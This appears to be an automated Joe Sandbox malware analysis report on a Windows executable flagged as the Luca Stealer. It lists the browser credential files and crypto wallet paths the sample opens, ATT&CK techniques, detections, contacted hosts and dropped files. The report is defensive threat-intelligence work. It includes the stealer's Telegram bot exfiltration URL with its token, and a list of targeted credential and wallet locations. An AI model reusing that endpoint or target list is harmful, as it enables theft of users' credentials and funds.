          Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\admmjipmmciaobhojoghlmleefbicajgJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache\Login DataJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jhfjfclepacoldmjmkmdlmganfaalklbJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\icmkfkmjoklfhlfdkkkgpnpldkgdmhoeJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\Login DataJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDB\Login DataJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fooolghllnmhmmndgjiamiiodkpenpbbJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\chgfefjpcobfbnpmiokfjjaglahmndedJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pnlccmojcmeohlpggmfnbbiapkmbliobJump to behavior
          Tries to steal Crypto Currency Wallets
          Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Roaming\exodus\exodus.wallet\Jump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Roaming\exodus\exodus.wallet\Jump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\Jump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\Jump to behavior

          Remote Access Functionality

          barindex
          Yara detected Luca Stealer
          Source: Yara matchFile source: 765iYbgWn9.exe, type: SAMPLE
          Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
          Source: Yara matchFile source: 0.0.765iYbgWn9.exe.7ff62f040000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: Process Memory Space: 765iYbgWn9.exe PID: 7552, type: MEMORYSTR

          Mitre Att&ck Matrix

          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid Accounts31
          Windows Management Instrumentation          		1
          DLL Side-Loading          		11
          Process Injection          		1
          Masquerading          		1
          OS Credential Dumping          		21
          Security Software Discovery          		Remote Services2
          Data from Local System          		1
          Web Service          		Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
          DLL Side-Loading          		1
          Disable or Modify Tools          		LSASS Memory1
          Process Discovery          		Remote Desktop ProtocolData from Removable Media1
          Encrypted Channel          		Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)31
          Virtualization/Sandbox Evasion          		Security Account Manager31
          Virtualization/Sandbox Evasion          		SMB/Windows Admin SharesData from Network Shared Drive1
          Ingress Tool Transfer          		Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
          Process Injection          		NTDS1
          Application Window Discovery          		Distributed Component Object ModelInput Capture3
          Non-Application Layer Protocol          		Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
          DLL Side-Loading          		LSA Secrets1
          System Network Configuration Discovery          		SSHKeylogging4
          Application Layer Protocol          		Scheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials1
          File and Directory Discovery          		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync22
          System Information Discovery          		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          765iYbgWn9.exe50%ReversingLabsWin64.Trojan.Barys
          765iYbgWn9.exe32%VirustotalBrowse

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          No Antivirus matches

          Domains

          SourceDetectionScannerLabelLink
          ipwho.is0%VirustotalBrowse
          api.telegram.org2%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
          https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
          https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
          https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
          https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
          https://www.ecosia.org/newtab/0%URL Reputationsafe
          https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
          https://duckduckgo.com/chrome_newtab0%Avira URL Cloudsafe
          https://duckduckgo.com/ac/?q=0%Avira URL Cloudsafe
          https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%VirustotalBrowse
          https://duckduckgo.com/ac/?q=0%VirustotalBrowse
          https://duckduckgo.com/chrome_newtab0%VirustotalBrowse
          https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%Avira URL Cloudsafe
          https://api.telegram.org/bot6082381502:AAFgFkge53k6kBZcTN8CBICiZV-VphQ1WgA/sendDocument?chat_id=57950%Avira URL Cloudsafe
          http://www.w3.or0%Avira URL Cloudsafe
          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%Avira URL Cloudsafe
          https://docs.rs/getrandom#nodejs-es-module-supportC:0%Avira URL Cloudsafe
          http://ns.adobe.0%Avira URL Cloudsafe
          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%VirustotalBrowse
          https://docs.rs/getrandom#nodejs-es-module-supportC:0%VirustotalBrowse

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          ipwho.is
          		195.201.57.90
          		truefalseunknown
          api.telegram.org
          		149.154.167.220
          		truetrueunknown

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          https://ac.ecosia.org/autocomplete?q=765iYbgWn9.exe, 00000000.00000003.1886356574.00000270FCA98000.00000004.00000020.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          • URL Reputation: safe
          		unknown
          https://duckduckgo.com/chrome_newtab765iYbgWn9.exe, 00000000.00000003.1886356574.00000270FCA98000.00000004.00000020.00020000.00000000.sdmpfalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          		unknown
          https://duckduckgo.com/ac/?q=765iYbgWn9.exe, 00000000.00000003.1886356574.00000270FCA98000.00000004.00000020.00020000.00000000.sdmpfalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          		unknown
          https://www.google.com/images/branding/product/ico/googleg_lodp.ico765iYbgWn9.exe, 00000000.00000003.1886356574.00000270FCA98000.00000004.00000020.00020000.00000000.sdmpfalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          		unknown
          https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search765iYbgWn9.exe, 00000000.00000003.1886356574.00000270FCA98000.00000004.00000020.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          • URL Reputation: safe
          		unknown
          https://api.telegram.org/bot6082381502:AAFgFkge53k6kBZcTN8CBICiZV-VphQ1WgA/sendDocument?chat_id=5795765iYbgWn9.exe, 00000000.00000003.1963664259.00000270FAD21000.00000004.00000020.00020000.00000000.sdmp, 765iYbgWn9.exe, 00000000.00000003.1963812730.00000270FCA20000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://www.w3.or765iYbgWn9.exefalse
          • Avira URL Cloud: safe
          		unknown
          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=765iYbgWn9.exe, 00000000.00000003.1886356574.00000270FCA98000.00000004.00000020.00020000.00000000.sdmpfalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          		unknown
          https://docs.rs/getrandom#nodejs-es-module-supportC:765iYbgWn9.exefalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          		unknown
          https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=765iYbgWn9.exe, 00000000.00000003.1886356574.00000270FCA98000.00000004.00000020.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          http://ns.adobe.765iYbgWn9.exefalse
          • Avira URL Cloud: safe
          		unknown
          https://www.ecosia.org/newtab/765iYbgWn9.exe, 00000000.00000003.1886356574.00000270FCA98000.00000004.00000020.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=765iYbgWn9.exe, 00000000.00000003.1886356574.00000270FCA98000.00000004.00000020.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown

          World Map of Contacted IPs

          • No. of IPs < 25%
          • 25% < No. of IPs < 50%
          • 50% < No. of IPs < 75%
          • 75% < No. of IPs

          Public IPs

          IPDomainCountryFlagASNASN NameMalicious
          149.154.167.220
          		api.telegram.orgUnited Kingdom
          		62041TELEGRAMRUtrue
          195.201.57.90
          		ipwho.isGermany
          		24940HETZNER-ASDEfalse

          General Information

          Joe Sandbox version:40.0.0 Tourmaline
          Analysis ID:1483815
          Start date and time:2024-07-29 07:37:05 +02:00
          Joe Sandbox product:CloudBasic
          Overall analysis duration:0h 6m 7s
          Hypervisor based Inspection enabled:false
          Report type:full
          Cookbook file name:default.jbs
          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
          Run name:Run with higher sleep bypass
          Number of analysed new started processes analysed:11
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:0
          Technologies:
          • HCA enabled
          • EGA enabled
          • AMSI enabled
          Analysis Mode:default
          Analysis stop reason:Timeout
          Sample name:765iYbgWn9.exe
          renamed because original name is a hash value
          Original Sample Name:0534ab10184891cd61d262bfd79b7b4c.exe
          Detection:MAL
          Classification:mal72.troj.spyw.winEXE@4/15@3/2
          EGA Information:Failed
          HCA Information:
          • Successful, ratio: 100%
          • Number of executed functions: 0
          • Number of non-executed functions: 0
          Cookbook Comments:
          • Found application associated with file extension: .exe
          • Sleeps bigger than 100000000ms are automatically reduced to 1000ms

          Warnings

          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, 6.0.1.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.7.0.0.0.0.3.0.1.3.0.6.2.ip6.arpa, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
          • Not all processes where analyzed, report is missing behavior information
          • Report size getting too big, too many NtOpenFile calls found.
          • Report size getting too big, too many NtOpenKeyEx calls found.
          • Report size getting too big, too many NtQueryValueKey calls found.
          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

          Simulations

          Behavior and APIs

          No simulations

          Joe Sandbox View / Context

          IPs

          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          149.154.167.220WfKynArKjH.exeGet hashmaliciousAsyncRAT, Luca Stealer, MicroClip, RedLineBrowse
            https://bming.cl/readm.html?colors=bWljaGFlbC5jaHVAbGNhdHRlcnRvbi5jb20=Get hashmaliciousUnknownBrowse
              lHqcAkPNu8.exeGet hashmaliciousXWormBrowse
                file.exeGet hashmaliciousClipboard HijackerBrowse
                  Nursultan Alpha Client.exeGet hashmaliciousDCRat, XWormBrowse
                    Easy Anti-Cheat Analyzer.exeGet hashmaliciousDCRat, XWormBrowse
                      encrypthub_steal.ps1Get hashmaliciousUnknownBrowse
                        encrypthub_steal.ps1Get hashmaliciousUnknownBrowse
                          QUOTATION_JULQTRA071244#U00b7PDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                            195.201.57.90WfKynArKjH.exeGet hashmaliciousAsyncRAT, Luca Stealer, MicroClip, RedLineBrowse
                            • /?output=json
                            ubes6SC7Vd.exeGet hashmaliciousUnknownBrowse
                            • ipwhois.app/xml/
                            cOQD62FceM.exeGet hashmaliciousLuca Stealer, Rusty StealerBrowse
                            • /?output=json
                            Clipper.exeGet hashmaliciousUnknownBrowse
                            • /?output=json
                            cOQD62FceM.exeGet hashmaliciousLuca StealerBrowse
                            • /?output=json
                            Cryptor.exeGet hashmaliciousLuca StealerBrowse
                            • /?output=json
                            Cryptor.exeGet hashmaliciousLuca Stealer, Rusty StealerBrowse
                            • /?output=json
                            rust-stealer-xss.exeGet hashmaliciousDiscord Token Stealer, Luca StealerBrowse
                            • /?output=json
                            Build.exeGet hashmaliciousLuca Stealer, QuasarBrowse
                            • /?output=json

                            Domains

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            ipwho.isWfKynArKjH.exeGet hashmaliciousAsyncRAT, Luca Stealer, MicroClip, RedLineBrowse
                            • 195.201.57.90
                            1d686b05f745875e28939abe357baedd169b59f5a0d88.exeGet hashmaliciousQuasarBrowse
                            • 195.201.57.90
                            http://appinforyvjhf6454ms1a.pages.dev/Get hashmaliciousTechSupportScamBrowse
                            • 195.201.57.90
                            https://l.facebook.com/l.php?u=https%3A%2F%2Fnutramart.store%2F%3Flabel%3D5efe465a4dbe59fbb290a966697fc1cd%26utm_medium%3Dpaid%26utm_source%3Dfb%26utm_id%3D6599688580361%26utm_content%3D6599688599961%26utm_term%3D6599688590961%26utm_campaign%3D6599688580361%26fbclid%3DIwZXh0bgNhZW0BMAABHdzmJULh8TsQt3pW_qnmIXPFdqLqBaBKW5T-aZYxDkCqac1lwtitUH-fNw_aem_UoCoKjZX08yMSHQS1Rk-lA&h=AT2Rbdo290L85DwdtmvCHSaYZeZQw6zVRZwOCmLUor4sXK9slv2_8Xz3sNHtiR9yk_5i3WV0TyI-vvISy2qX4eX89xJtn5joKswTFrWNikf-8BbcY1c3OSbcsV7ioNYHeRE&__tn__=%2CmH-R&c%5B0%5D=AT1zpbOywPCbT61x3IUZxcKH5NMmiyOktbAovmzxAnO3GQxZoE9RLlfDBYeXTFE8UxKMEzW4i7Rw_yO3qxx7WfbLZEKXf2a_gqDGEIqK5xACO326D8DwbL9YKGpFirOaXzMC_oPb4wgEghT5w108ehD0lVOUa18OX2Yna4VvaAaIUpPjAkk9gOhJw0AtcNc8dmXxzoPXiUwIYEI1VCwKUmK1G_lmEdu24Iq9UJ_ic75uGIJuxQwEttfLYZ0HqkC3D8EpDSqIjHE7T12pe_syL5VjKXEGR6hZ3F-YEVJbiZGhU5diMWZAvsPL2bUpvSMNWrEu14yqnXQK7Z-1xnZRSbLWmzHp53sdCj21Get hashmaliciousUnknownBrowse
                            • 195.201.57.90
                            Q2XwE8NRLx.exeGet hashmaliciousQuasarBrowse
                            • 195.201.57.90
                            https://kohojoiy.pages.dev/Get hashmaliciousTechSupportScamBrowse
                            • 195.201.57.90
                            http://ofclgtaiopoi.z13.web.core.windows.netGet hashmaliciousTechSupportScamBrowse
                            • 195.201.57.90
                            http://ofclgtaiopoi.z13.web.core.windows.netGet hashmaliciousTechSupportScamBrowse
                            • 195.201.57.90
                            dzCvoZ0uLj.exeGet hashmaliciousQuasarBrowse
                            • 195.201.57.90
                            api.telegram.orgWfKynArKjH.exeGet hashmaliciousAsyncRAT, Luca Stealer, MicroClip, RedLineBrowse
                            • 149.154.167.220
                            https://bming.cl/readm.html?colors=bWljaGFlbC5jaHVAbGNhdHRlcnRvbi5jb20=Get hashmaliciousUnknownBrowse
                            • 149.154.167.220
                            lHqcAkPNu8.exeGet hashmaliciousXWormBrowse
                            • 149.154.167.220
                            file.exeGet hashmaliciousClipboard HijackerBrowse
                            • 149.154.167.220
                            Nursultan Alpha Client.exeGet hashmaliciousDCRat, XWormBrowse
                            • 149.154.167.220
                            Easy Anti-Cheat Analyzer.exeGet hashmaliciousDCRat, XWormBrowse
                            • 149.154.167.220
                            encrypthub_steal.ps1Get hashmaliciousUnknownBrowse
                            • 149.154.167.220
                            encrypthub_steal.ps1Get hashmaliciousUnknownBrowse
                            • 149.154.167.220
                            file.exeGet hashmaliciousPython Stealer, Amadey, Monster Stealer, PureLog Stealer, RedLine, Stealc, VidarBrowse
                            • 149.154.167.220

                            ASNs

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            TELEGRAMRUWfKynArKjH.exeGet hashmaliciousAsyncRAT, Luca Stealer, MicroClip, RedLineBrowse
                            • 149.154.167.220
                            https://bming.cl/readm.html?colors=bWljaGFlbC5jaHVAbGNhdHRlcnRvbi5jb20=Get hashmaliciousUnknownBrowse
                            • 149.154.167.220
                            https://join-telegram.apl-my.com/virallbn/Get hashmaliciousUnknownBrowse
                            • 149.154.167.99
                            lHqcAkPNu8.exeGet hashmaliciousXWormBrowse
                            • 149.154.167.220
                            file.exeGet hashmaliciousClipboard HijackerBrowse
                            • 149.154.167.220
                            https://kaslasa.ru/Get hashmaliciousUnknownBrowse
                            • 149.154.167.99
                            https://telegarm-com.icu/Get hashmaliciousTelegram PhisherBrowse
                            • 149.154.167.99
                            Nursultan Alpha Client.exeGet hashmaliciousDCRat, XWormBrowse
                            • 149.154.167.220
                            Easy Anti-Cheat Analyzer.exeGet hashmaliciousDCRat, XWormBrowse
                            • 149.154.167.220
                            HETZNER-ASDEWfKynArKjH.exeGet hashmaliciousAsyncRAT, Luca Stealer, MicroClip, RedLineBrowse
                            • 195.201.57.90
                            1d686b05f745875e28939abe357baedd169b59f5a0d88.exeGet hashmaliciousQuasarBrowse
                            • 195.201.57.90
                            file.exeGet hashmaliciousVidarBrowse
                            • 5.75.212.60
                            SecuriteInfo.com.Win32.Evo-gen.21074.1738.exeGet hashmaliciousSmokeLoaderBrowse
                            • 188.40.141.211
                            mek_n_bat.batGet hashmaliciousUnknownBrowse
                            • 78.47.143.65
                            file.exeGet hashmaliciousVidarBrowse
                            • 5.75.212.60
                            1lKbb2hF7fYToopfpmEvlyRN.exeGet hashmaliciousLummaC, VidarBrowse
                            • 5.75.212.60
                            file.exeGet hashmaliciousVidarBrowse
                            • 5.75.212.60
                            https://www.formajo.com/bestbuy/fxc/cmVhbGVtYWlsQGppbW15am9obi5jb20=Get hashmaliciousHTMLPhisherBrowse
                            • 88.99.142.215

                            JA3 Fingerprints

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            3b5074b1b5d032e5620f69f9f700ff0eWfKynArKjH.exeGet hashmaliciousAsyncRAT, Luca Stealer, MicroClip, RedLineBrowse
                            • 149.154.167.220
                            http://pub-a29070233cb54ef393c1ddea471f903c.r2.dev/index.htmlGet hashmaliciousUnknownBrowse
                            • 149.154.167.220
                            https://gdhddyyyu-yfdrfs-f48b55.ingress-earth.ewp.live/wp-content/plugins/ddrxmis/pages/region.phpGet hashmaliciousUnknownBrowse
                            • 149.154.167.220
                            https://metamaskuh.azurewebsites.net/Get hashmaliciousUnknownBrowse
                            • 149.154.167.220
                            http://pub-63ee9e97e9eb46d78c12a9137fdc4d90.r2.dev/invoice.htmGet hashmaliciousHTMLPhisherBrowse
                            • 149.154.167.220
                            http://pub-58a4baf41c124648bdc4fe772188accd.r2.dev/index.htmlGet hashmaliciousUnknownBrowse
                            • 149.154.167.220
                            http://pub-40cb77b4a6d84294bfa2db6a96f70ff7.r2.dev/index.htmlGet hashmaliciousUnknownBrowse
                            • 149.154.167.220
                            http://www.capitalonebnks.com/Get hashmaliciousUnknownBrowse
                            • 149.154.167.220
                            http://pub-8198ef94712a43e5a05e0ea8720214fd.r2.dev/oblivionauth%5D.htmlGet hashmaliciousHTMLPhisherBrowse
                            • 149.154.167.220

                            Dropped Files

                            No context

                            Created / dropped Files

                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):64
                            Entropy (8bit):0.773832331134527
                            Encrypted:false
                            SSDEEP:3:NlllulAtl:NllUAX
                            MD5:6FB656DDCC392CD101B1AD13F38D52CB
                            SHA1:2ADE827066E70D9F9126FEF8B4E88FFDC5F29C25
                            SHA-256:F3AFB3F90407560397CF3D1E841BE8C7F50F6216E3B5C0FF95186610E9658A4D
                            SHA-512:11DF425EDB51507E476AD42555FBF2E862664D07F206E4A02175AE3F9F785DA772BCFF1EBC640626ABF96AC9BAE1EB4F5BC0AE686EB3559D85D334069FC02BC5
                            Malicious:false
                            Reputation:moderate, very likely benign file
                            Preview:@...e...........................................................

                            C:\Users\user\AppData\Local\Temp\Cookies

                            Download File
                            Process:C:\Users\user\Desktop\765iYbgWn9.exe
                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                            Category:dropped
                            Size (bytes):20480
                            Entropy (8bit):0.6732424250451717
                            Encrypted:false
                            SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                            MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                            SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                            SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                            SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                            Malicious:false
                            Reputation:high, very likely benign file
                            Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                            C:\Users\user\AppData\Local\Temp\CreditCardData

                            Download File
                            Process:C:\Users\user\Desktop\765iYbgWn9.exe
                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                            Category:dropped
                            Size (bytes):196608
                            Entropy (8bit):1.1209886597424439
                            Encrypted:false
                            SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8QbnVcxjONC4Je5Q:r2qOB1nxCkvSAELyKOMq+8QTQKC+
                            MD5:EFD26666EAE0E87B32082FF52F9F4C5E
                            SHA1:603BFE6A7D6C0EC4B8BA1D38AEA6EFADDC42B5E0
                            SHA-256:67D4CAA4255418EB18873F01597D1F4257C4146D1DCED78E26D5FD76B783F416
                            SHA-512:28ADD7B8D88795F191567FD029E9F8BC9AEF7584CE3CD56DB40BBA52BC8335F2D8E53A5CE44C153C13A31FD0BE1D76D1E558A4AA5987D5456C000C4D64F08EAA
                            Malicious:false
                            Reputation:moderate, very likely benign file
                            Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                            C:\Users\user\AppData\Local\Temp\History

                            Download File
                            Process:C:\Users\user\Desktop\765iYbgWn9.exe
                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
                            Category:dropped
                            Size (bytes):155648
                            Entropy (8bit):0.5407252242845243
                            Encrypted:false
                            SSDEEP:96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
                            MD5:7B955D976803304F2C0505431A0CF1CF
                            SHA1:E29070081B18DA0EF9D98D4389091962E3D37216
                            SHA-256:987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
                            SHA-512:CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
                            Malicious:false
                            Reputation:high, very likely benign file
                            Preview:SQLite format 3......@ .......&..................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                            C:\Users\user\AppData\Local\Temp\Login Data

                            Download File
                            Process:C:\Users\user\Desktop\765iYbgWn9.exe
                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                            Category:dropped
                            Size (bytes):51200
                            Entropy (8bit):0.8746135976761988
                            Encrypted:false
                            SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                            MD5:9E68EA772705B5EC0C83C2A97BB26324
                            SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                            SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                            SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                            Malicious:false
                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                            C:\Users\user\AppData\Local\Temp\Web Data

                            Download File
                            Process:C:\Users\user\Desktop\765iYbgWn9.exe
                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                            Category:dropped
                            Size (bytes):196608
                            Entropy (8bit):1.1209886597424439
                            Encrypted:false
                            SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8QbnVcxjONC4Je5Q:r2qOB1nxCkvSAELyKOMq+8QTQKC+
                            MD5:EFD26666EAE0E87B32082FF52F9F4C5E
                            SHA1:603BFE6A7D6C0EC4B8BA1D38AEA6EFADDC42B5E0
                            SHA-256:67D4CAA4255418EB18873F01597D1F4257C4146D1DCED78E26D5FD76B783F416
                            SHA-512:28ADD7B8D88795F191567FD029E9F8BC9AEF7584CE3CD56DB40BBA52BC8335F2D8E53A5CE44C153C13A31FD0BE1D76D1E558A4AA5987D5456C000C4D64F08EAA
                            Malicious:false
